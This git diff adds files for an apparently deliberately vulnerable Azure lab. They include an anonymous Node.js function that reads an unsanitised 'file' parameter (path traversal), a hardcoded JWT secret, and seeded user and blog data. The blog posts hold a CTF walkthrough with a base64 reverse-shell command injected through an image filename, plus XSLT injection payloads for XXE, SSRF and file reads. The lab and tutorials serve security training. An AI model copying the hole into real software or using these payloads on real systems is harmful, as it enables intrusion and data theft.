a/modules/module-1/resources/azure_function/data/app/__pycache__/__init__.cpython-38.pyc b/modules/module-1/resources/azure_function/data/app/__pycache__/__init__.cpython-38.pyc new file mode 100644 index 0000000..83daf09 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/app/__pycache__/__init__.cpython-38.pyc differ diff --git a/modules/module-1/resources/azure_function/data/app/function.json b/modules/module-1/resources/azure_function/data/app/function.json new file mode 100644 index 0000000..31fecf7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/app/function.json @@ -0,0 +1,21 @@ +{ + "scriptFile": "__init__.py", + "bindings": [ + { + "authLevel": "anonymous", + "type": "httpTrigger", + "direction": "in", + "name": "req", + "methods": [ + "get", + "post" + ], + "route": "/{*path}" + }, + { + "type": "http", + "direction": "out", + "name": "$return" + } + ] +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/host.json b/modules/module-1/resources/azure_function/data/host.json new file mode 100644 index 0000000..2bc092f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/host.json @@ -0,0 +1,20 @@ +{ + "version": "2.0", + "logging": { + "applicationInsights": { + "samplingSettings": { + "isEnabled": true, + "excludedTypes": "Request" + } + } + }, + "extensionBundle": { + "id": "Microsoft.Azure.Functions.ExtensionBundle", + "version": "[2.*, 3.0.0)" + }, + "extensions": { + "http": { + "routePrefix": "" + } + } +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/local.settings.json b/modules/module-1/resources/azure_function/data/local.settings.json new file mode 100644 index 0000000..8ee6895 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/local.settings.json @@ -0,0 +1,12 @@ +{ + "IsEncrypted": false, + "Values": { + "FUNCTIONS_WORKER_RUNTIME": "python", + "AzureWebJobsStorage": "UseDevelopmentStorage=true", + "JWT_SECRET" :"T2BYL6#]zc>Byuzu", + "AZ_DB_ENDPOINT" :"AZ_DB_ENDPOINT_REPLACE", + "AZ_DB_PRIMARYKEY" :"AZ_DB_PRIMARYKEY_REPLACE", + "CON_STR" :"CON_STR_REPLACE", + "CONTAINER_NAME" :"CONTAINER_NAME_REPLACE" + } +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/requirements.txt b/modules/module-1/resources/azure_function/data/requirements.txt new file mode 100644 index 0000000..aa3fe64 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/requirements.txt @@ -0,0 +1,9 @@ +# Do not include azure-functions-worker as it may conflict with the Azure Functions platform + +# Minimum packages for azure functions + +# Additional packages +azure-cosmos==4.3.0 +azure-storage-blob==12.12.0 +bcrypt==3.2.2 +pyjwt==1.7.1 diff --git a/modules/module-1/resources/azure_function/react/.funcignore b/modules/module-1/resources/azure_function/react/.funcignore new file mode 100644 index 0000000..a3a7965 --- /dev/null +++ b/modules/module-1/resources/azure_function/react/.funcignore @@ -0,0 +1,13 @@ +*.js.map +*.ts +.git* +.vscode +.devcontainer/* +.editorconfig +.env.example +.eslintignore +.eslintrc.js +.gitignore +.prettierrc +local.settings.json +terraform/* \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/host.json b/modules/module-1/resources/azure_function/react/host.json new file mode 100644 index 0000000..2bc092f --- /dev/null +++ b/modules/module-1/resources/azure_function/react/host.json @@ -0,0 +1,20 @@ +{ + "version": "2.0", + "logging": { + "applicationInsights": { + "samplingSettings": { + "isEnabled": true, + "excludedTypes": "Request" + } + } + }, + "extensionBundle": { + "id": "Microsoft.Azure.Functions.ExtensionBundle", + "version": "[2.*, 3.0.0)" + }, + "extensions": { + "http": { + "routePrefix": "" + } + } +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/package.json b/modules/module-1/resources/azure_function/react/package.json new file mode 100644 index 0000000..f8799fb --- /dev/null +++ b/modules/module-1/resources/azure_function/react/package.json @@ -0,0 +1,9 @@ +{ + "name": "", + "version": "", + "description": "", + "scripts" : { + "test": "echo \"No tests yet...\"" + }, + "author": "" +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/webapp/function.json b/modules/module-1/resources/azure_function/react/webapp/function.json new file mode 100644 index 0000000..b1f9fda --- /dev/null +++ b/modules/module-1/resources/azure_function/react/webapp/function.json @@ -0,0 +1,20 @@ +{ + "bindings": [ + { + "authLevel": "anonymous", + "type": "httpTrigger", + "direction": "in", + "name": "req", + "methods": [ + "get", + "post" + ], + "route": "/{*page}" + }, + { + "type": "http", + "direction": "out", + "name": "res" + } + ] +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/webapp/index.html b/modules/module-1/resources/azure_function/react/webapp/index.html new file mode 100644 index 0000000..b0020e9 --- /dev/null +++ b/modules/module-1/resources/azure_function/react/webapp/index.html @@ -0,0 +1 @@ +INE

\ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/webapp/index.js b/modules/module-1/resources/azure_function/react/webapp/index.js new file mode 100644 index 0000000..86cb777 --- /dev/null +++ b/modules/module-1/resources/azure_function/react/webapp/index.js @@ -0,0 +1,37 @@ +var fs = require('fs'); +const util = require('util'); +const readFileAsync = util.promisify(fs.readFile); + +module.exports = async function (context, req) { + if(context.req.query.file){ + let data; + try { + data = await readFileAsync(`./webapp/${context.req.query.file}`); + } catch (err) { + context.log.error('ERROR', err); + throw err; + } + context.res = { + body: data, + headers: { + "Content-Type": "application/javascript" + }}; + context.done(); + }else{ + let data; + try { + data = await readFileAsync('./webapp/index.html'); + } catch (err) { + context.log.error('ERROR', err); + // This rethrown exception will be handled by the Functions Runtime and will only fail the individual invocation + throw err; + } + context.res = { + body: data, + headers: { + "Content-Type": "text/html" + }}; + context.done(); + } + +} diff --git a/modules/module-1/resources/cosmosdb/blog-posts.json b/modules/module-1/resources/cosmosdb/blog-posts.json new file mode 100644 index 0000000..8a701b8 --- /dev/null +++ b/modules/module-1/resources/cosmosdb/blog-posts.json @@ -0,0 +1,92 @@ +[ + { + "id": "1", + "email": "johndoe@gmail.com", + "authorName": "John Doe", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525172652568597.png", + "postContent": "

Cloud security is a deeply nuanced topic. Although the fundamentals remain the same as traditional cybersecurity, most practitioners are unfamiliar with the intricacies of cloud security.

To bridge this gap, our AWS cloud security syllabus covers IAM, API Gateway, Lambda, Cloud Databases and S3. By learning to secure these 5 most commonly used AWS components, professionals with a traditional cybersecurity background can be equipped with cloud-compatible skills.

We covered the technicals of these 5 components in a previous blog post, but what exactly do the labs entail? Let’s find out:

What are Pentester Academy’s AWS Cloud Security labs?

Our AWS labs are the first in the industry to provide a dedicated sandbox environment for AWS pentesting — essentially, they’re a “cloud playground” where you can learn and practice attacks without the hassle and risk of using your personal AWS account. Here’s what makes our cloud labs unique:


  • No AWS account required: our dedicated sandbox environment already contains real AWS accounts and lets you pentest cloud deployments directly in your browser. Getting started with cloud security has never been easier!
  • Industry-relevant syllabus: Given that most AWS deployments are breached by a common set of vulnerabilities which attackers repeatedly use, learning our syllabus — which covers such vulnerabilities — makes you job-ready immediately.
  • On-demand bootcamp recordings included: annual subscribers also get access to 19+ hours of bootcamp recordings to get you up to speed on both theory and practice!


How the labs are structured

Our 50+ AWS Cloud Security lab exercises are split into 6 categories — IAM, API Gateway, Lambda, Databases, DynamoDB and S3. Collectively, they cover the 5 components mentioned above (DynamoDB falls under Cloud Databases), and teach you how to identify and leverage misconfigurations hands-on.


Each category covers the corresponding component in depth, from basics/enumeration to advanced scenarios. Here are some attacks you can look forward to learning:

  1. Leverage misconfigured IAM policies to escalate privileges
  2. Understand AWS Lambda and exploit vulnerable applications to get a foothold
  3. Abuse overly permissive policies and misconfigured roles to escalate privileges
  4. Attack API Gateway endpoints via various means to bypass authentication
  5. Leverage S3 misconfigurations to steal data and chain attacks
  6. Gain persistency on a Lambda environment and steal any data processed by the lambda function, even if the principle of least privilege is followed


", + "postingDate": "2022-05-25T00:00:00.000Z", + "postTitle": "Pentester Academy's AWS Cloud Security Labs", + "postStatus": "approved" + }, + { + "id": "2", + "email": "johndoe@gmail.com", + "authorName": "John Doe", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525172652548627.png", + "postContent": "

In our lab walkthrough series, we go through selected lab exercises on our AttackDefense Platform. Premium labs require a subscription, but you can sign in for free to try our community labs and view the list of topics — no subscription or VPN required!


The Metasploit Framework is a popular and powerful network penetration testing tool, used widely all around the world. The framework provides ready to use exploits, information-gathering modules to take advantage of the system’s weaknesses. It has powerful in-built scripts and plugins that allow us to automate the process of exploitation.

Lab Scenario

We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.


Lab: https://attackdefense.pentesteracademy.com/challengedetails?cid=1492

This lab comprises a kali machine with all tools installed on it. The user or practitioner will get a shell command-line interface (CLI) access to the Kali machine, through the web browser.

Challenge Statement

The target server as described below is running a vulnerable web application. Your task is to fingerprint the application using command-line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module.


Objective: Get a Meterpreter shell on the target!


", + "postingDate": "2022-04-04T00:00:00.000Z", + "postTitle": "Premium Lab: Navigate CMS Unauthenticated Remote Code Execution", + "postStatus": "approved" + }, + { + "id": "3", + "email": "johndoe@gmail.com", + "authorName": "John Doe", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525173155599484.png", + "postContent": "

Mass Assignment occurs when an API takes user input directly and maps the values passed by the user to the backend object models.

What’s wrong with that?

If there are sensitive fields in the data models like isAdminisPremiumUser, isASubscriber, etc, a malicious party who controls these values can wreck havoc! They could make themselves an admin/premium user/subscriber and (mis)use the product or service — not an ideal situation.

Why does Mass Assignment happen?

Oh that was intern’s mistake…


Really? Nah… Let’s discuss the actual reasons!

Let’s face it — developers are lazy! Many rely on a lot of frameworks and boiler-plate code. Any method that makes their tasks easy, finds its way into their code.

Frameworks and programming languages help developers map user requests to object mapping just using a one-liner! As developers, we love the convenience but that’s what leads to this vulnerability in the first place!

This is the reality of development work — not something I made up, but something I have experienced myself while I was a developer. It’s so profound and second-nature to the developers! If you are one, or have been there, I am sure you would have that smile on your face :)

Mass Assignment is a cool bug that can get you a P1, if you are into pentesting or bug bounties! It’s not that common and that’s why it’s holds a 6th position in the API Security Top 10 list.

Case Study: Mass Assignment Exploitation in the Wild

While keeping up on API Security, we came across this interesting post, which demonstrates a methodology to perform mass assignment, which aligns with our own, so it’s worth sharing:

Mass Assignment exploitation in the wild - Escalating privileges in style

As I have been accepted to Synack's Red Team at the beginning of march, the opportunity emerged required me and other…

galnagli.com


Pentesting Methodology

The researcher had 2 accounts — 1 with higher privileges and one with lower privileges. He then made profile updation requests to an endpoint and observed the parameters being passed in both the accounts — unprivileged and privileged.


This gave him a hint that there was an extra parameter in the API requests which was sent in the privileged user’s profile update request.

So the next natural step was to try setting the same parameter in the unprivileged user’s profile update request, and voila! That resulted in giving the unprivileged user privileged access! Bingo — that was Mass Assignment in action.

In our experience, we have also seen that sometimes the response to the updation requests reveals such parameters as well, and thus those should also be looked at while hunting for this vulnerability.


", + "postingDate": "2022-03-08T00:00:00.000Z", + "postTitle": "Hunting for Mass Assignment", + "postStatus": "approved" + }, + { + "id": "4", + "email": "phasellus@aol.ca", + "authorName": "Connor Cantrell", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525173359279634.png", + "postContent": "

To help you master specific topics, we offer both bootcamp recordings and learning paths (curated sets of labs). Here, we outline our DevSecOps on-demand bootcamp and learning path, which begins with DevOps and teaches you how to integrate security into it.

For access, subscribe to an annual plan, which includes on-demand bootcamps, learning paths and more labs for other topics!

Introduction: DevOps vs. DevSecOps

Any discussion of DevSecOps merits mention of DevOps as well. Before delving into the DevSecOps learning path, let’s first compare DevOps and DevSecOps:


DevOps: A framework for efficient software development

The different components of the DevOps framework

Wikipedia explains DevOps bestIt is “a set of practices that combines software development (Dev) and IT operations (Ops). It aims to shorten the systems development life cycle and provide continuous delivery with high software quality.”

Today, DevOps has become a predominant approach in software and product development. It allows better visibility, coordination and faster iterations in comparison to other relatively older processes like SDLC or Agile, making it popular.

But there lies a critical issue with DevOps: with this framework, software development teams do not take security into account. Along with high-pressure commercial timelines and lack of security awareness, developers end up releasing code containing vulnerabilities.

And thus, DevSecOps was born.

DevSecOps: Integrating Security with DevOps

DevSecOps = DevOps + Security

The name says it all: DevSecOps integrates security (Sec) into DevOps. DevSecOps is a set of practices of adding security components to each step of the DevOps process. It aims to shorten the systems development life cycle and provide continuous delivery with high software quality while taking care of the security aspect.

Instead of having a team for manual security testing, it is more efficient and cost/time-effective to have automated security checks to catch issues as soon as possible.

DevSecOps is thus a highly demanded and regarded skill in the industry. As a career-focused cybersecurity education company, we set out to equip professionals with DevSecOps knowledge through our on-demand bootcamp and learning path.

", + "postingDate": "2022-04-12T00:00:00.000Z", + "postTitle": "DevSecOps: Integrating Security with DevOps", + "postStatus": "rejected" + }, + { + "id": "5", + "email": "phasellus@aol.ca", + "authorName": "Connor Cantrell", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525173435646544.png", + "postContent": "

To help you master specific topics, we offer both bootcamp recordings and learning paths (curated sets of labs). In this post, we outline our WebApp Security on-demand bootcamp and learning path, which will help you build a solid foundation in WebApp pentesting.

For access, subscribe to an annual plan, which includes on-demand bootcamps, learning paths and more labs for other topics!

Why Learn Web Application Pentesting?

Most enterprises, regardless of size, run their own web applications. Vulnerabilities in these web applications make them prime targets for hackers — and hackers succeed at a very high cost both to enterprises and their customers.


Web application security is essential mainly because of the scale of impact. Millions of people interact with web applications every day to do everything from reading the news to shopping for groceries to planning their finances, and many of these applications store personal data such as addresses and credit card information. A single vulnerability is all a hacker needs to retrieve all of this. Thus, no pentester can be truly effective without a working understanding of web application security.

Start with our WebApp Security Bootcamp

Click here to see what’s covered.

This on-demand bootcamp lets you practice attacks on real-world web applications and teaches the subtle differences between pentesting traditional and cloud-based applications. Throughout 4 sessions, you will learn WebApp basics, OWASP Top 10 vulnerabilities and more, all via hands-on practice in our labs.

  • 12+ hours of live bootcamp recordings
  • 50+ Lab Exercises

After learning the concepts with the recordings, move on to our learning path which goes beyond the bootcamp’s syllabus to cover common tools used in WebApp pentesting and more!

WebApp Pentesting Learning Path

In the Web Application Pentesting learning path, you’ll learn to systematically dissect the inner mechanics of an application, chalk out the threatscape, identify possible attack vectors and then use various tools and techniques to launch the attack.

The learning path contains over 60 lab exercises, split into the below sections to build your skills progressively. The sections are standalone; however we recommend beginners tackle them in this order:

  • Web Application Basics: Before any pentesting, it is important to learn what web applications are and how they work.
  • Tools of the Trade: Next, we’ll look at manual exploitation techniques using popular open-source attack tools, such as Burp Suite and Gobuster.
  • OWASP Top 10: OWASP Top 10 is an awareness document that outlines the most critical security risks to web applications. Here, you’ll learn how to pentest according to the OWASP TOP 10 standard.
  • Webapp CVEs (Common Vulnerabilities and Exposures): To round off your learning, you’ll see how to search for publicly available exploits and leverage it to compromise a target machine.

Overall, these labs and techniques are technology-stack agnostic and will use a combination of simulated and real-world applications. When you finish the entire learning path, you’d have developed a solid foundation in Web Application Pentesting.

Prerequisites

To get the most out of this learning path, we recommend that you have:


  • A basic knowledge of computers and networking
  • Familiarity with the Linux operating system

Let’s dive in!

", + "postingDate": "2022-01-01T00:00:00.000Z", + "postTitle": "Web Application Pentesting: A Versatile Skill", + "postStatus": "approved" + }, + { + "id": "6", + "email": "interdum.curabitur@aol.com", + "authorName": "Raja Bauer", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525174934318996.png", + "postContent": "

To help you master specific topics, we offer both bootcamp recordings and learning paths (curated sets of labs). In this post, we outline our Container Security on-demand bootcamp and learning path — covering everything from basics to advanced.

For access, subscribe to an annual plan, which includes on-demand bootcamps, learning paths and more labs for other topics!

Containers: an overview

Over the last decade, largely because of the Docker open-source project, the interest in Linux container technology has exploded. Containers use operating system-level virtualization to isolate applications from one another. They are lightweight in comparison to virtual machines as they share the host machine’s kernel.


Docker has enabled developers to rapidly build and share applications, and Kubernetes has enabled these applications to be deployed and scaled dynamically. This has led to the widespread adoption of Docker in the industry.

However, like all complex software systems, the container ecosystem is prone to misconfiguration, leading to vulnerabilities that can be exploited by malicious users. Because of this, understanding container security and being able to audit a container environment are critical skills that all security professionals should possess.



This is a 4-session beginner bootcamp that will teach you the basics of containers and how to secure them. Learn how misconfigured components can lead to breakout attacks and eventually, host compromise.

This on-demand bootcamp covers different tools and techniques to audit containers, container hosts, image repositories and container management tools. Our unique lab setup lets you try low-level breakout attacks which otherwise can only be done in local virtual machines.

  • 9+ hours of live bootcamp recordings
  • 60+ Lab Exercises


What will you learn?

The Container Security learning path contains 11 categories of lab exercises that cover the basic concepts of container security and pentesting. You will learn how to use various tools and commands to identify and exploit vulnerabilities in the different components of the container ecosystem.


Prerequisites

To get the most out of this learning path, we recommend that you have:


  • A basic knowledge of computers and networking
  • Familiarity with the Linux operating system
  • Optionally, a basic knowledge of Docker

While each set of labs can be completed in any order, we recommend the following sequence:

Container Basics


This section explores the container management systems Docker and Podman. The labs also cover the low-level components of the Docker system e.g. containerd, runc. Beginners will learn how to perform basic operations like pushing, pulling, creating and running containers. You will learn:

  • Using Docker client to perform basic operations including push, pull, build images and interacting with the container/network
  • Using podman to create, manage and interact with containers, images and networks
  • Interacting with containerd to run containers
  • Running Docker containers using Docker images with runc and umoci


", + "postingDate": "2022-01-12T00:00:00.000Z", + "postTitle": "Container Security: Securing the Docker Ecosystem", + "postStatus": "approved" + }, + { + "id": "7", + "email": "interdum.curabitur@aol.com", + "authorName": "Raja Bauer", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525175114306915.png", + "postContent": "

The Linux Operating System forms the basis of a huge number of the applications that we use every day on the Internet. Linux servers are configured for uses as varied as high-performance computing, storage, network routing, and web servers. This flexibility has meant that the management of a Linux server is a complex subject with plenty of room for error. A large number of deployments and configurations has also led to new vulnerabilities being discovered almost every day. To protect a deployment on Linux, a system administrator must ensure that the Linux servers are always up to date with the latest security patches. A single vulnerable service or a minor mistake in configuration could leave the server, and the data residing on it, vulnerable to attack.


As a pentester, it is important to know how to scout for vulnerabilities and the ways they can be exploited. But first, one has to know how Linux works. In our labs, you’ll be using a Kali/Ubuntu Attacker machine to attack other Linux-based target machines.

Our learning path thus starts with Linux Basics, where you will learn concepts, commands and tools required to interact with various Linux services and applications. Specifically, the path covers:

  • Understanding the Linux filesystem and users
  • Understanding the system and user crontabs
  • Learning the important Linux commands and tools
  • Fingerprinting web applications and network services such as FTP and SSH
  • Creating bi-directional connections with socat

Once you’re comfortable with Linux, we’ll move on to explain Linux pentesting in the context of the 5 phases of hacking:

The 5 phases of hacking is a well-known methodology amongst security professionals, where attacks start with a reconnaissance phase and end with covering tracks. In our learning path, we expand on this methodology and show you how to perform additional phases such as Pivoting and Exploit Research.

Let’s dive right in!

Reconnaissance

Before attacking any application or service, it is important to gather as much information as possible. The more information an attacker has, the easier it will be to identify any misconfigurations and vulnerabilities. The objective of the reconnaissance section is to familiarize the student with the approach to follow for enumerating web applications and various network services, such as DNS, web servers, databases, caching systems, etc. Using the information, the attack vector and entry points can be identified and then used in the exploitation phase.


In our reconnaissance section, you’ll learn:

  • Identifying open ports on the machine
  • Identifying services running on the machine
  • Interacting with network services
  • Fingerprinting different types of services
  • Understanding service-specific misconfigurations
  • Enumerating files/directories on web applications
  • Scanning web application using popular scanners and identifying the entry points

Exploitation

The objective of the exploitation phase is to establish access to a system or resource by leveraging a vulnerability or bypassing a security restriction. In this section, the student will learn how to search for exploits based on the information acquired in the reconnaissance phase and use them to compromise the application or service. Once the attacker has compromised a machine, it is possible to attack other machines on the same network which may not be exposed to the Internet.


This section covers:

", + "postingDate": "2022-02-06T00:00:00.000Z", + "postTitle": "Linux Pentesting: From Recon to Exploit Research", + "postStatus": "pending" + }, + { + "id": "8", + "email": "orci.adipiscing@google.com", + "authorName": "Quinn Baird", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525175420931108.png", + "postContent": "

I will be discussing how you can go about gaining root on a target machine in 3 different ways! Let's jump right into it.


A little background on the Challenge

For those who haven’t tried this CTF challenge yet, let me share some overview on the challenge. Then I’ll jump to the real meat of this post and we’ll learn how to get a shell session on the target machine in different ways!


The challenge consists of an Online Image Converter webapp (not the prettiest creature, but it works ;)

Image Converter webapp provided in the challenge

It provides 3 features:

  • To generate an Image Art by supplying some text
  • To convert an image to another format (say from PNG to JPG)
  • To convert images to another format in BULK (expecting a zip archive to be uploaded).

Looks benign, right? I would say, don’t be quick to judge the book by its cover ;)

Okay, enough with background information. And now, the FUN part!

Exploitation a.k.a. The FUN stuff

In this post, I’ll be covering 3 different ways in which you could have got the MOST difficult flag. Out of those, 2 ways let you have root shell on the target machine!


Excited? Let’s get going…

Approach 1:

Objective: In this approach, I will cover how to get the most difficult flag without getting a root shell.


Vulnerability: Command Injection in the image art generation

Outcome: We will get the shell session of a low-privileged user (robert)

Steps:

Step 1: Create a sample image using scrot utility (or any other way you prefer):

Commands:

scrot test.png

ls

Generate a sample image to be uploaded to the webapp

Step 2: Before uploading the image to the webapp, rename it so that once it gets processed by the backend code, the payload commands in the image name get executed and you get back a shell session!

Commands:

ip a

echo -n ‘bash -i >& /dev/tcp/192.104.205.2/4444 0>&1’ | base64

Check the IP address and encode a reverse shell payload

This is done because a file name cannot contain forward slashes (‘/’).

Step 3: Modify the name of the test.png file and have the payload name there instead.

New Image Name: ‘; bash -c “$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTA0LjIwNS4yLzQ0NDQgMD4mMQ== | base64 -d)”;.png’

Command: cp test.png ‘; bash -c “$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTA0LjIwNS4yLzQ0NDQgMD4mMQ== | base64 -d)”;.png’

Copy the test image and create another image having payload in its name

Step 4: Start a netcat listener on the attacker machine before uploading the image.

Command: nc -lvp 4444

Start a netcat listener

Step 5: Upload the image to the webapp.

", + "postingDate": "2022-01-01T00:00:00.000Z", + "postTitle": "Highlights: API Security CTF [Nov 20-24]", + "postStatus": "approved" + }, + { + "id": "9", + "email": "tempor@icloud.net", + "authorName": "Prescott Hensley", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525175644356721.png", + "postContent": "

If learning cybersecurity through offense is interesting to you, try our AttackDefense Lab Platform, containing 2000+ lab exercises covering various topics. Sign in for free to try our community labs and view the list of topics — no subscription or VPN required! And if you want to access our full depth of labs, check out our subscription.


Introduction

XML is quite widely known format and I am sure you must even have heard a lot about XXE (XML External Entity) and it’s even a part of OWASP Top 10 list for Web Application Security.


But have you heard of XSLT?

It stands for Extensible Stylesheet Language Transformations and is a language used for transforming XML documents to either XML or other formats like HTML, SVG, SVG, plain text, etc…

As listed in Wikipedia page for XSLT:

Although XSLT is designed as a special-purpose language for XML transformation, the language is Turing-complete, making it theoretically capable of arbitrary computations.


That must already sound too much fun.

XSLT provides constructs like loops, if, switch-case, and other functions like substring, etc. to perform manipulations to the XML documents. Not only that, it even allows you to define functions and call them as well. Amazing!

It uses XPath to locate the different subsets of the XML document tree and then it can be used to perform operations on them: check for their values, perform functions on the contents, and much much more.

There’s a really awesome tutorial on XSLT and XPath. I highly recommend this one if you wish to learn more on XSLT & XPath. But for the scope of this post, the stuff we discussed will suffice.

XSLT Injections

Now let’s talk about the interesting bits.


Injection issues happen when the user input is blindly trusted without thinking of the consequences. If the right conditions are set, then this can result in data exfiltration, RCE, XSS and much much more.

If a user is able to supply their own XSLT files or inject XSLT tags, then this can result in XSLT injections. The constructs that you have at your disposal greatly depend on the processor that’s being used and the version of the XSLT specification. Version 1 is most widely used and supported because the newer versions: 2 & 3 are backwards compatible and also because the browsers support version 1 and hence, the popularity.

Version 2 & 3 have a lot more features compared to version 1 so the exploitation becomes much more easy with the higher versions. But still, with 1, you can get a lot of stuff done. Here are some interesting issues:

  • RCE
  • Local File Read (via error messages)
  • XXE
  • SSRF and Port Scans

In the XSLT ecosystem, we have a different number of processors including:

Source: https://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf

As you can already notice, libxslt is quite common and mostly, the version is 1 except Saxon by Saxonica which is quite feature rich and supports both version 1 and 2.

So for our discussion, we will discuss on libxslt. It’s a C library developed for the GNOME project. You can try it out on CLI on Linux using the xsltproc command.

Now let’s focus on the attacks. This is not supposed to be an exhaustive guide on the subject (I’ve linked more resources at the end of this article for a deeper dive). We will just touch upon the basics and I will show you RCE & Local File Read using XSLT injection.

Consider an application that takes an arbitrary XSLT file and then parses it’s contents. What do you think could happen?

Recon

You might be thinking all this is good to know but how do you even know that what’s the processor being used. Because otherwise it would be sort of a “blind” attack and that’s more painful and noisy, right? Worry not, there are some tags you could use for performing recon.


These are the 3 tags that would give you back the version, vendor and vendor url:

<xsl:value-of select=\"system-property('xsl:version')\" />\n<xsl:value-of select=\"system-property('xsl:vendor')\" />\n<xsl:value-of select=\"system-property('xsl:vendor-url')\" />\n

So you would now know of all the features are supported by the processor and move forward to the exploitation part.

RCE

An XSLT file like this could result in RCE, if the application is vulnerable (if registerPHPFunctions is enabled):


Local File Read

And not only that, you could even read the contents of a local file (at least 1 line) via the reported error messages:


XSLT file containing the payload to read /etc/passwd file

Processing the XLST file results in leaking the first line of /etc/passwd file

Notice that the application gave out an error but the first line still was revealed! It happened because document (or even include & import functions for that matter) would try to parse the specified file and since the passwd file was not a valid XML file, these functions would error out and show the first line of the file.

Now you might think that this is quite limiting, but wait a minute… If the application was running as root, you could get the root user’s password hash by reading the first line of the shadow file. And you can even read the contents of the .htpasswd file to get the password hash for admin or other users.

So it isn’t all in vain.

XXE

You could even perform XXE but that should be obvious. Consider this example:


<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM \"path/to/file\">]>\n<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n  <xsl:template match=\"/events\">\n    Events &ext_file;:\n    <xsl:for-each select=\"event\">\n      <xsl:value-of select=\"name\"/>: <xsl:value-of select=\"value\"/>\n    </xsl:for-each>\n  </xsl:template>\n\n</xsl:stylesheet>\n

SSRF & Port Scanning

Using a payload like this one (omitted the extra stuff just for brevity):


<xsl:copy-of select=\"document('http://10.10.10.10:22')\"/>\n

You can see that this would make a request to the specified IP. Now you can imagine that with this primitive, you get the power to perform SSRF and even port scans by leveraging the different error messages you get back for different scenarios (port ope, closed, invalid host, etc.).

Extra Resources

I’ve went through only a few of the attacks that can be performed, but there’s more! For that, I recommend you to go through the following resources that go much more in-depth:


  1. Abusing XSLT For Practical Attacks
  2. XSLT Injection
  3. XSLT Server Side Injection Attacks
  4. XSLT Security and Server Side Request Forgery
  5. The hidden dangers of XSLTProcessor — Remote XSL injection
  6. XSLT Injection Basics — Saxon
  7. An unexpected journey: From XSLT injection to a shell

Closing Thoughts

I hope you enjoyed this post and learnt something interesting. I wanted to cover XSLT injections on a higher level and show the different attacks possible. There’s a lot more to learn and all the resources that I have linked should give you a much deeper understanding. Overall, there’s nothing much to this vulnerability other than untrusted user-input being taken by the processor, and the nuances are specific to different processors and different languages.


If you’re confident with XSLT and related attacks, I encourage you to test yourself and earn our API security badge (sign in here, then head to our API Security badge challenge, subscribers only). In specific, this lab focuses on XSLT attacks. No hints in these challenges, you’re on your own now!

I’ll see you in the next post. Until then, happy learning!


", + "postingDate": "2022-05-12T00:00:00.000Z", + "postTitle": "XSLT Injections for Dummies", + "postStatus": "approved" + } +] \ No newline at end of file diff --git a/modules/module-1/resources/cosmosdb/blog-users.json b/modules/module-1/resources/cosmosdb/blog-users.json new file mode 100644 index 0000000..80ae406 --- /dev/null +++ b/modules/module-1/resources/cosmosdb/blog-users.json @@ -0,0 +1,107 @@ +[ + { + "email": "johndoe@gmail.com", + "address": "John Doe apartment, John Doe Street, Pune", + "authLevel": "0", + "country": "India", + "id": "1", + "name": "John Doe", + "password": "$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO", + "phone": "1234567890", + "secretAnswer": "Cricket", + "secretQuestion": "What is your favourite sport?", + "username": "johndoe", + "userStatus": "active", + "creationDate": "2022-01-25T00:00:00.000Z" + }, + { + "email": "interdum.curabit@aol.com", + "address": "Ap #434-4703 Erat St.", + "authLevel": "200", + "country": "Mexico", + "id": "2", + "name": "Caryn Barr", + "password": "$2a$10$aUxnhrJEfoB1GDfqx8YF/uDgmbTJ/eJuzmnWgLeXjKV.maPOC4k2G", + "phone": "0712376412", + "secretAnswer": "8", + "secretQuestion": "At what age did you first interacted with a computer?", + "username": "carynbarr", + "userStatus": "active", + "creationDate": "2022-04-04T00:00:00.000Z" + }, + { + "email": "tempor@icloud.net", + "address": "5823 Velit St.", + "authLevel": "200", + "country": "South Africa", + "id": "3", + "name": "Prescott Hensley", + "password": "$2a$10$na.4xDXxaFiX0J0PDje20eGo3pHzHNElP.PiTF6wrctkTv9vmmYZG", + "phone": "0848627138", + "secretAnswer": "Lamp", + "secretQuestion": "What is your favourite colour?", + "username": "prescotthensley", + "userStatus": "active", + "creationDate": "2022-03-08T00:00:00.000Z" + }, + { + "email": "tempus.risus@aol.net", + "address": "P.O. Box 959, 723 Lobortis St.", + "authLevel": "100", + "country": "India", + "id": "4", + "name": "Dimitry Levy", + "password": "$2a$10$CSXpoeXZDCxXLrhWh.zmD.cM9UgNAoc0fADmUCgEe0lGH4FyXP6be", + "phone": "0227915835", + "secretAnswer": "Tiger", + "secretQuestion": "What is your first pet's name?", + "username": "dimitrylevy", + "userStatus": "active", + "creationDate": "2022-04-12T00:00:00.000Z" + }, + { + "email": "orci.adipiscing@google.com", + "address": "964-8243 Ipsum St.", + "authLevel": "300", + "country": "Netherlands", + "id": 